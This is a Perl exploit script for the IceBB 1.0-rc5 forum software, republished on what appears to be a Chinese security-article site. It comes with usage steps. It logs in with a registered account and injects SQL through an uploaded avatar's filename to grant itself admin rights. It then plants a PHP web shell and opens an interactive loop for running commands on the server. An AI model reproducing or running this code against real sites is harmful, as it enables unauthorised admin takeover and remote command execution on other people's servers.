IceBB 1.0-rc5 Remote Code Execution Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

IceBB 1.0-rc5 Remote Code Execution Exploit

来源：www.Hessamx.Net 作者：Hessam-x 发布时间：2007-03-27

#!/usr/bin/perl
# IceBB 1.0-rc5 Remote Code Execution Exploit
# 1. register a user
# 2. run this exploit with this usage : $perl xpl.pl [host&path] [uname] [pass]
# 3. login with admin access :)
#
#
#### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net

use LWP::UserAgent;
use HTTP::Cookies;

$port = "80";
$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;

print q(
###########################################################
#          IceBB 1.0-rc5 Remote Code Exec Exploit         #
#                    www.Hessamx.Net                      #
################# (C)oded By Hessam-x #####################

);

if (@ARGV < 3) {
print " # usage : xpl.pl [host&path] [uname] [pass]\n";
print " # e.g : xpl.pl www.milw0rm.com/icebb/ str0ke 123456\n";
exit();
}

   print " [~] User/Password : $uname/$passwd \n";
   print " [~] Host : $host \n";

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );

$login = $xpl->post($url.'index.php',
Content => [
'act' => 'login',
'from' => 'index.php',
'user' => $uname,
'pass' => $passwd,
'func' => 'Login',
],);

if($cookie_jar->as_string =~ /icebb_sessid=(.*?);/) {
       $cookie = $1;
   print " [~] Logined ...\n";
} else {
print " [-] Can not Login In $host !\n";
exit();
}

$badcode = "', user_group='1";
$avata = $xpl->post($url.'index.php',Content_Type => 'form-data',
Content => [
'avtype' => 'upload',
'act' => 'ucp',
'func' => 'avatar',
'file'   => [
              undef,
              'avatar.jpg'.$badcode,
              Content_type => 'text/plain',
              Content => 'MYAVATAR',
             ],
'submit'        => 'Save',
],
);
$avat = $xpl->post($url.'index.php',Content_Type => 'form-data',
Content => [
'avtype' => 'upload',
'act' => 'ucp',
'func' => 'avatar',
'file'   => [
              undef,
              'shell.php'.$badcode,
              Content_type => 'text/plain',
              Content => '<? echo 1 ; echo _START_ ; system(\$_GET[\'cmd\']); echo _END_ ; ?>',
             ],
'submit'        => 'Save',
],
);
$test = $xpl->get($url.'index.php');
if($test->as_string =~ /Admin Control Center/) {
print " [+] You Are admin Now ! \n";
} else {
print " [-] Exploit Failed ! \n";
exit();
}
if($test->as_string =~ /profile=(.*?)'>/) {
$uid = $1;
print " [~] User id : $1 \n";
} else {
print " [?] please enter user id : ";
     chomp($uid=<STDIN>);
}

   while ()
{
     print "\n[Shell - type 'exit' for exit]\$ ";
     chomp($exc=<STDIN>);
    &sys($exc);
}
sub sys($exc) {
     if ($exc eq 'exit') { exit() ; }
$res = $xpl->get($url.'uploads/av-'.$uid.'.php?cmd='.$exc);
@result = split(/\n/,$res->content);
$runned = 0;
$on = 0;
for $res(@result) {
   if ($res =~ /^_END_/) { print "\n"; return 0; }
   if ($on == 0) { print " $res\n"; }
   if ($res =~ /^_START_/) { $on = 1; $runned = 1; }
}
   if (!$runned) { print "\n Can not execute command . EXPLOIT FAILED !\n" ; exit(); };

}

print "\n #################################################### \n";

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告